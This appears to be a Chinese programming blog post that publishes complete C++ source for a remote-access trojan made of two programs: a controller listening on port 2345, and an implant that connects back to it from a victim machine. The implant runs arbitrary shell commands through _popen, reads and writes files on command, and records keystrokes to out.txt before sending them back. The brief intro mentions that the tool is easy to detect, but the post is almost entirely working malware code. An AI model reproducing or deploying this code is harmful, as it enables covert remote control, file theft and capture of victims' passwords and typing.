【网络编程】Trojan源码 文件传输+远程cmd+键盘记录


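Trojan可以实现三个功能,分别为文件传输、远程执行cmd、键盘记录。其中键盘记录功能没有利用hook函数,而是循环调用GetAsyncKeyState轮询按键状态,作者认为这样隐蔽性较强;但这种高频轮询本身就是终端防护产品会监控的典型行为,而且按键记录会先写入本地的out.txt再回传,所有通信都以明文走TCP 2345端口,因此在主机和网络两侧都留有明显痕迹。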

现在给出源码:


client(控制端:在本机绑定并监听2345端口,等待受控主机连入后下发操作):

// client.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"  #include <winsock2.h>  #include <cstdio>#include <wincrypt.h>#include <cstring>#include <iostream>  #include <string.h> #include<vector>#include<time.h>#define PORT 2345#define BUFFER_SIZE 1024#pragma comment(lib, "user32.lib")#pragma comment(lib, "shlwapi.lib")#pragma comment(lib, "ws2_32.lib")   #pragma comment(lib, "crypt32.lib")  using namespace std;unsigned char mac_mine[6] = { 0x40, 0xe2, 0x30, 0x68, 0x43, 0xa9 };//我的mac地址 40-E2-30-68-43-A9unsigned char ip_mine[16] = {"127.0.0.1" };//我的ip  172.20.10.5int num;struct node{sockaddr_in addrClient;SOCKET socketClient;}host[1024];//检测是否有新的主机连接DWORD WINAPI ClientThread(LPVOID lpParameter){int len = sizeof(SOCKADDR);SOCKET socketClient;sockaddr_in addrClient;int id = 0;SOCKET socketSever = (SOCKET)lpParameter;while (true){socketClient = accept(socketSever, (SOCKADDR *)&addrClient, &len);num++;host[num].addrClient=addrClient;host[num].socketClient = socketClient;}}//将断开连接的主机删除void RemoveHost(int id){for (int i = id; i < num; i++){host[i] = host[i + 1];}num--;}//检查是否有主机断开连接void HostClear(){for (int i = num; i >=1; i--){int sendbuf = 0;int Result=send(host[i].socketClient, (char*)&sendbuf, sizeof(int), 0);if (Result == SOCKET_ERROR){RemoveHost(i);}}}//刷新void refresh(){HostClear();cout << "受控主机数:" << num << endl;for (int i = 1; i <= num; i++){cout << i << ".   
ip:" << inet_ntoa(host[i].addrClient.sin_addr) << "   port:" << host[i].addrClient.sin_port << endl;}}int recvn(SOCKET s, char * recvbuf, unsigned int fixedlen){int iResult;int cnt = fixedlen; //剩余多少字节尚未接收 while (cnt > 0){iResult = recv(s, recvbuf, cnt, 0);if (iResult < 0){printf("error: %d\n", WSAGetLastError());return -1;}if (iResult == 0)//对方关闭连接,返回已接收到的小于fixedlen的字节数 return fixedlen - cnt;recvbuf += iResult;cnt -= iResult;}return fixedlen;}//远程执行cmdvoid UseCmd(int id){SOCKET s = host[id].socketClient;charbuf[BUFFER_SIZE];char result[BUFFER_SIZE * 64];int  inputlen;getchar();while (1){memset(buf, 0, sizeof(buf));memset(result, 0, sizeof(result));cout << "C:\\Socket\\Client>";cin.getline(buf, sizeof(buf)); send(s, buf, BUFFER_SIZE, 0);if (buf[0] == 'e'&&buf[1] == 'x'&&buf[2] == 'i'&&buf[3] == 't'){cout << "The End." << endl;return ;}recvn(s, result, sizeof(result));printf(result);}}void GetFile(int id){SOCKET s = host[id].socketClient;char filename[BUFFER_SIZE];memset(filename, 0, sizeof(filename));cout << "输入文件名:";getchar();cin.getline(filename, sizeof(filename));send(s, filename, sizeof(filename), 0); TCHAR name[BUFFER_SIZE];memset(name, 0, sizeof(name));for (int i = 0; filename[i]; i++){name[i] = filename[i];}HANDLE hFile;DWORD count;hFile = CreateFile(name, // 文件名GENERIC_WRITE,          // 写入权限0,                      // 阻止其他进程访问NULL,                   // 子进程不可继承本句柄CREATE_ALWAYS,             // 仅不存在时创建新文件FILE_ATTRIBUTE_NORMAL,  // 普通文件NULL);unsigned int filelen;recvn(s, (char *)&filelen, sizeof(unsigned int));filelen = ntohl(filelen);unsigned int recvbuflen = min(filelen, BUFFER_SIZE);char recvbuf[BUFFER_SIZE];while (filelen > 0){cout << filelen << endl;memset(recvbuf, 0, sizeof(recvbuf));unsigned int recvlen=recvn(s, recvbuf, recvbuflen);WriteFile(hFile, recvbuf, recvlen, &count, 0);filelen -= recvlen;recvbuflen = min(filelen, recvbuflen); }CloseHandle(hFile);cout << "文件接收成功!" 
<< endl;}void SendFile(int id){SOCKET  s = host[id].socketClient;char filename[BUFFER_SIZE];memset(filename, 0, sizeof(filename));cout << "输入文件名:";getchar();cin.getline(filename, sizeof(filename));send(s, filename, BUFFER_SIZE, 0);TCHAR name[BUFFER_SIZE];memset(name, 0, sizeof(name));for (int i = 0; filename[i]; i++){name[i] = filename[i];}HANDLE hFile;hFile = CreateFile(name,GENERIC_READ,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);DWORD dwBytesRead, dwBytesToRead;unsigned int filelen = GetFileSize(hFile, NULL);unsigned int filelen1 = htonl(filelen);send(s, (char*)&filelen1, sizeof(unsigned int), 0);char buf[BUFFER_SIZE*32];dwBytesToRead = filelen;dwBytesRead = 0;while (dwBytesToRead > 0){cout << dwBytesToRead << endl;memset(buf, 0, sizeof(buf));ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);if (dwBytesRead == 0)break;dwBytesToRead -= dwBytesRead;send(s, buf, dwBytesRead, 0);}CloseHandle(hFile);cout << "文件传输成功!" << endl;}void KeyLogger(int id){SOCKET  s = host[id].socketClient;cout << "请输入记录时长:";int Time;cin >> Time;send(s, (char*)&Time, sizeof(int), 0);char filename[BUFFER_SIZE] = "KeyLogger.txt";TCHAR name[BUFFER_SIZE];for (int i = 0;i<BUFFER_SIZE; i++)name[i] = filename[i];HANDLE hFile;DWORD count;hFile = CreateFile(name, // 文件名GENERIC_WRITE,          // 写入权限0,                      // 阻止其他进程访问NULL,                   // 子进程不可继承本句柄CREATE_ALWAYS,             // 仅不存在时创建新文件FILE_ATTRIBUTE_NORMAL,  // 普通文件NULL);unsigned int filelen;recvn(s, (char *)&filelen, sizeof(unsigned int));filelen = ntohl(filelen);unsigned int recvbuflen = min(filelen, BUFFER_SIZE);char recvbuf[BUFFER_SIZE];cout << endl;while (filelen > 0){cout << filelen << " ";memset(recvbuf, 0, sizeof(recvbuf));unsigned int recvlen = recvn(s, recvbuf, recvbuflen);cout << recvlen << endl;WriteFile(hFile, recvbuf, recvlen, &count, 0);filelen -= recvlen;recvbuflen = min(filelen, recvbuflen);}CloseHandle(hFile);cout << "文件接收成功!" 
<< endl;}int _tmain(int argc, _TCHAR* argv[]){WORD sockVersion = MAKEWORD(2, 2);WSADATA wsaData;int error = WSAStartup(sockVersion, &wsaData);if (error != 0){cout << "fail to startup! " << WSAGetLastError() << endl;return 0;}SOCKET socketSever = socket(AF_INET, SOCK_STREAM, 0);if (socketSever == INVALID_SOCKET){cout << "socket error! " << WSAGetLastError() << endl;WSACleanup();closesocket(socketSever);return 0;}//本机socket 地址sockaddr_in addrServer;addrServer.sin_addr.S_un.S_addr = htonl(INADDR_ANY);addrServer.sin_family = AF_INET;addrServer.sin_port = htons(PORT);//将socket绑定在本地端口if (bind(socketSever, (SOCKADDR*)&addrServer, sizeof(SOCKADDR)) == SOCKET_ERROR){cout << "bind error! " << WSAGetLastError() << endl;;closesocket(socketSever);WSACleanup();return 0;}if (listen(socketSever, 10) == SOCKET_ERROR)cout << "Listen failed with error " << WSAGetLastError() << endl;num = 0;HANDLE hThread = NULL;hThread = CreateThread(NULL, 0, ClientThread, (LPVOID)socketSever, 0, NULL);refresh();while (1){cout << "请选择操作" << endl;cout << "---------------------------------------------------"<<endl;cout << "|                    请输入选项                   |" << endl;cout << "|                    0.刷新主机                   |" << endl;cout << "|                    1.获取文件                   |" << endl;cout << "|                    2.发送文件                   |" << endl;cout << "|                    3.远程控制                   |" << endl;cout << "|                    4.键盘记录                   |" << endl;cout << "---------------------------------------------------" << endl;int choice;cin >> choice;if (choice == 0){refresh();}else{cout << "选择受控主机编号: ";int id;cin >> id;send(host[id].socketClient, (char*)&choice, sizeof(int), 0);if (choice == 1){GetFile(id);}if (choice == 2){SendFile(id);}if (choice == 3){UseCmd(id);}if (choice == 4){KeyLogger(id);}}}CloseHandle(hThread);closesocket(socketSever);return 0;}


server(受控端:运行在被控主机上,主动连接控制端的2345端口并按收到的操作码执行):

// server.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"  #include <winsock2.h>  #include <cstdio>#include <wincrypt.h>#include <time.h>#include <cstring>#include <iostream>  #include <string.h> #define PORT 2345#define BUFFER_SIZE 1024#pragma comment(lib, "user32.lib")#pragma comment(lib, "shlwapi.lib")#pragma comment(lib, "ws2_32.lib")   #pragma comment(lib, "crypt32.lib")  using namespace std;char IP[16] = { "127.0.0.1" };char *LowerCase[] = {"b","e","[ESC]","[F1]","[F2]","[F3]","[F4]","[F5]","[F6]","[F7]","[F8]","[F9]","[F10]","[F11]","[F12]","`","1","2","3","4","5","6","7","8","9","0","-","=","[TAB]","q","w","e","r","t","y","u","i","o","p","[","]","a","s","d","f","g","h","j","k","l",";","'","z","x","c","v","b","n","m",",",".","/","\\","[CTRL]","[WIN]"," ","[WIN]","[Print Screen]","[Scroll Lock]","[Insert]","[Home]","[PageUp]","[Del]","[End]","[PageDown]","[Left]","[UP]","[Right]","[Down]","[Num Lock]","/","*","-","+","0","1","2","3","4","5","6","7","8","9",".",};// Upper Case Key & Some Other Keyschar *UpperCase[] = {"b","e","[ESC]","[F1]","[F2]","[F3]","[F4]","[F5]","[F6]","[F7]","[F8]","[F9]","[F10]","[F11]","[F12]","~","!","@","#","$","%","^","&","*","(",")","_","+","[TAB]","Q","W","E","R","T","Y","U","I","O","P","{","}","A","S","D","F","G","H","J","K","L",":","\"","Z","X","C","V","B","N","M","<",">",".?","│","[CTRL]","[WIN]"," ","[WIN]","[Print Screen]","[Scroll Lock]","[Insert]","[Home]","[PageUp]","[Del]","[End]","[PageDown]","[Left]","[Up]","[Right]","[Down]","[Num Lock]","/","*","-","+","0","1","2","3","4","5","6","7","8","9",".",};// Ascii Keys,Forget About Itint SpecialKeys[] = {8,13,27,112,113,114,115,116,117,118,119,120,121,122,123,192,49,50,51,52,53,54,55,56,57,48,189,187,9,81,87,69,82,84,89,85,73,79,80,219,221,65,83,68,70,71,72,74,75,76,186,222,90,88,67,86,66,78,77,188,190,191,220,17,91,32,92,44,145,45,36,33,46,35,34,37,38,39,40,144,111,106,109,107,96,97,98,99,100,101,102,103,104,105,110,};HWND PreviousFocus = NULL;int recvn(SOCKET s, char * recvbuf, 
unsigned int fixedlen){int iResult;int cnt = fixedlen; //剩余多少字节尚未接收 while (cnt > 0){iResult = recv(s, recvbuf, cnt, 0);if (iResult < 0){printf("error: %d\n", WSAGetLastError());return -1;}if (iResult == 0)//对方关闭连接,返回已接收到的小于fixedlen的字节数 return fixedlen - cnt;recvbuf += iResult;cnt -= iResult;}return fixedlen;}void SendFile(SOCKET s){char filename[BUFFER_SIZE];memset(filename, 0, sizeof(filename));recvn(s, filename, BUFFER_SIZE); cout << filename << endl;TCHAR name[BUFFER_SIZE];memset(name, 0, sizeof(name));for (int i = 0; filename[i]; i++)name[i] = filename[i];HANDLE hFile;hFile = CreateFile(name,GENERIC_READ,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);DWORD dwBytesRead, dwBytesToRead;unsigned int filelen = GetFileSize(hFile, NULL);unsigned int filelen1 = htonl(filelen);send(s, (char*)&filelen1, sizeof(unsigned int), 0);char buf[BUFFER_SIZE * 32];dwBytesToRead = filelen;dwBytesRead = 0;while (dwBytesToRead > 0){cout << dwBytesToRead << endl;memset(buf, 0, sizeof(buf));ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);if (dwBytesRead == 0)break;dwBytesToRead -= dwBytesRead;send(s, buf, dwBytesRead, 0); }CloseHandle(hFile);}void GetFile(SOCKET s){char filename[BUFFER_SIZE];memset(filename, 0, sizeof(filename));recvn(s, filename, BUFFER_SIZE);TCHAR name[BUFFER_SIZE];memset(name, 0, sizeof(name));for (int i = 0; filename[i]; i++){name[i] = filename[i];}HANDLE hFile;DWORD count;hFile = CreateFile(name, // 文件名GENERIC_WRITE,          // 写入权限0,                      // 阻止其他进程访问NULL,                   // 子进程不可继承本句柄CREATE_ALWAYS,             // 仅不存在时创建新文件FILE_ATTRIBUTE_NORMAL,  // 普通文件NULL);unsigned int filelen;recvn(s, (char *)&filelen, sizeof(unsigned int));filelen = ntohl(filelen);unsigned int recvbuflen = min(filelen, BUFFER_SIZE);char recvbuf[BUFFER_SIZE];while (filelen > 0){cout << filelen << endl;memset(recvbuf, 0, sizeof(recvbuf));unsigned int recvlen = recvn(s, recvbuf, recvbuflen);WriteFile(hFile, recvbuf, recvlen, &count, 0);filelen -= recvlen;recvbuflen = 
min(filelen, recvbuflen);}CloseHandle(hFile);cout << "文件接收成功!" << endl;}int execmd(char* cmd, char* result) {char buffer[BUFFER_SIZE];                         //定义缓冲区                        FILE* pipe = _popen(cmd, "r");            //打开管道,并执行命令 if (!pipe)return 0;                      //返回0表示运行失败 while (!feof(pipe)) {if (fgets(buffer, BUFFER_SIZE, pipe)){             //将管道输出到result中 strcat(result, buffer);}}_pclose(pipe);                            //关闭管道 return 1;                                 //返回1表示运行成功 }void UseCmd(SOCKET s){char buf[BUFFER_SIZE];char result[BUFFER_SIZE * 64]; while (1){memset(buf, 0, sizeof(buf));memset(result, 0, sizeof(result));recvn(s, buf, BUFFER_SIZE); if (buf[0] == 'e'&&buf[1] == 'x'&&buf[2] == 'i'&&buf[3] == 't'){return;}execmd(buf, result); send(s, result, sizeof(result),0);}}char *WindowCaption = (char*)malloc(sizeof(char)* (100 + 2)); // Allocate Memory For The CaptionBOOL IsWindowsFocusChange(){HWND hFocus = GetForegroundWindow(); // Retrieve The Active Windows's FocusBOOL ReturnFlag = FALSE; // Declare The Return Flagif (hFocus != PreviousFocus) // The Active Windows Has Change{PreviousFocus = hFocus; // Save The Old Active Windos Focusint WinLeng = GetWindowTextLength(hFocus); // Get The Active Windows's Caption's Lengthmemset(WindowCaption, 0, sizeof(WindowCaption));//char *WindowCaption = (char*)malloc(sizeof(char)* (WinLeng + 2)); // Allocate Memory For The Caption//char WindowCaption[52];GetWindowText(hFocus, (LPWSTR)WindowCaption, (WinLeng + 1)); // Retrieve The Active Windows's Captionif (WindowCaption != NULL&&strlen(WindowCaption) > 0) // Really Get The Windows's Caption{//printf("rnThe Active Windows Title: %srn", WindowCaption); // Display The Active Windows's CaptionReturnFlag = TRUE; // Indicate The Windows's Focus Has Changed}//free(WindowCaption); // Free The Allocated Memory} return ReturnFlag; // Return The Flag}// End Of IsWindowsFocusChange 
Function//-------------------------------------------------------------------------// Purpose: To Manage(Display)The Keys Retrieved From System's Key Buffer// Return Type: Boolean// Parameters: NULL//-------------------------------------------------------------------------BOOL KeyLogger(int Time){Time *= 125;int bKstate[256] = { 0 }; // Declare The Key State Arrayint i, x;char KeyBuffer[600]; // Key Buffer Arrayint state; // Variable To Hode State Of Some Special Key Like CapsLock,Shift And ectint shift; // Variable To Hode State Of Shift Key// Reset The Buffermemset(KeyBuffer, 0, sizeof(KeyBuffer));char filename[1024] = { "out.txt" };TCHAR name[1024];for (int i = 0; i < 1024; i++)name[i] = filename[i];HANDLE hFile;DWORD count;hFile = CreateFile(name, // 文件名GENERIC_WRITE,          // 写入权限0,                      // 阻止其他进程访问NULL,                   // 子进程不可继承本句柄CREATE_ALWAYS,             // 仅不存在时创建新文件FILE_ATTRIBUTE_NORMAL,  // 普通文件NULL);DWORD cnt;while (Time--) // Forever Loop Is Taking Place Here{Sleep(8); // Rest For A While,And Avoid Taking 100% CPU Usage.Pretty Important To Add This Line Or The System Gets Fucked UPif (IsWindowsFocusChange()) //Check The Active Windows Title{if (strlen(KeyBuffer) != 0) // Keys Are Pressed{//printf("%s", KeyBuffer); // Display The Keys PressedWriteFile(hFile, KeyBuffer, 600, &cnt, 0);memset(KeyBuffer, 0, sizeof(KeyBuffer)); // reset The Buffer}}for (i = 0; i<92; i++) // Looping To Check Visual Keys{shift = GetKeyState(VK_SHIFT); // Check Whether Shift Is Pressedx = SpecialKeys[i]; // Match The Keyif (GetAsyncKeyState(x) & 0x8000) // Check Combination Keys{// See Whether CapsLocak Or Shift Is Pressedif (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed{bKstate[x] = 1; //Uppercase Characters A-Z}elseif (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed{bKstate[x] = 2; //Lowercase a-z}elseif (shift < 0) // Shift Is 
Pressed{bKstate[x] = 3; //Uppercase Characters A-Z}elsebKstate[x] = 4; //Lowercase a-z}else{if (bKstate[x] != 0) // No Combination Keys Detected{state = bKstate[x]; // Retrieve The Current StatebKstate[x] = 0; // Reset The Current Stateif (x == 8) // Back Space Is Detected{KeyBuffer[strlen(KeyBuffer) - 1] = 0; // One Key Back Thencontinue; // Start A New Loop}elseif (strlen(KeyBuffer) > 550) // Buffer FULL{//printf("%s <Buffer Full>", KeyBuffer); // Display The Keys RetrievedWriteFile(hFile, KeyBuffer, 600, &cnt, 0);memset(KeyBuffer, 0, sizeof(KeyBuffer)); // Reset The Buffercontinue; // Start A New Loop}elseif (x == 13) // Enter Is Detected{if (strlen(KeyBuffer) == 0) // No Other Keys Retrieved But Enter{continue; // Start A New Loop}//printf("%s<Enter>", KeyBuffer); // Retrieve Other Keys With EnterWriteFile(hFile, KeyBuffer, 600, &cnt, 0);memset(KeyBuffer, 0, sizeof(KeyBuffer)); // Display The Keys With Entercontinue; // Start A New Loop}elseif ((state % 2) == 1) //Must Be Upper Case Characters{strcat(KeyBuffer, UpperCase[i]); // Store The Key To Key Buffer}elseif ((state % 2) == 0) // Must Be Lower Case Characters{strcat(KeyBuffer, LowerCase[i]); // Store The Key To Key Buffer}}}}// End Of For Loop}// End Of While LoopCloseHandle(hFile);return TRUE; // Return To The Caller}// End Of KeyLogger Function// End Of Filevoid UseKeyLogger(SOCKET s){int Time;recv(s, (char*)&Time, sizeof(int), 0);KeyLogger(Time);char filename[BUFFER_SIZE] = "out.txt";TCHAR name[BUFFER_SIZE];memset(name, 0, sizeof(name));for (int i = 0; filename[i]; i++)name[i] = filename[i];HANDLE hFile;hFile = CreateFile(name,GENERIC_READ,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);DWORD dwBytesRead, dwBytesToRead;unsigned int filelen = GetFileSize(hFile, NULL);unsigned int filelen1 = htonl(filelen);send(s, (char*)&filelen1, sizeof(unsigned int), 0);char buf[BUFFER_SIZE * 32];dwBytesToRead = filelen;dwBytesRead = 0;while (dwBytesToRead > 0){cout << dwBytesToRead << endl;memset(buf, 0, 
sizeof(buf));ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);if (dwBytesRead == 0)break;dwBytesToRead -= dwBytesRead;send(s, buf, dwBytesRead, 0);}CloseHandle(hFile);}int _tmain(int argc, _TCHAR* argv[]){WORD sockVersion = MAKEWORD(2, 2);WSADATA wsaData;int error = WSAStartup(sockVersion, &wsaData);if (error){cout << "fail to startup" << GetLastError() << endl;WSACleanup();return -1;}SOCKET socketClient = socket(AF_INET, SOCK_STREAM, 0);if (socketClient == INVALID_SOCKET){cout << "socket error!  " << GetLastError() << endl;WSACleanup();closesocket(socketClient);return -1;}sockaddr_in addrServer;addrServer.sin_addr.S_un.S_addr = inet_addr(IP);addrServer.sin_family = AF_INET;addrServer.sin_port = htons(PORT);connect(socketClient, (SOCKADDR*)&addrServer, sizeof(SOCKADDR));int op;while (1){recvn(socketClient, (char*)&op, sizeof(int)); if (op == 1){SendFile(socketClient);}if (op == 2){GetFile(socketClient);}if (op == 3){UseCmd(socketClient);}if (op == 4){UseKeyLogger(socketClient);}}closesocket(socketClient);return 0;}




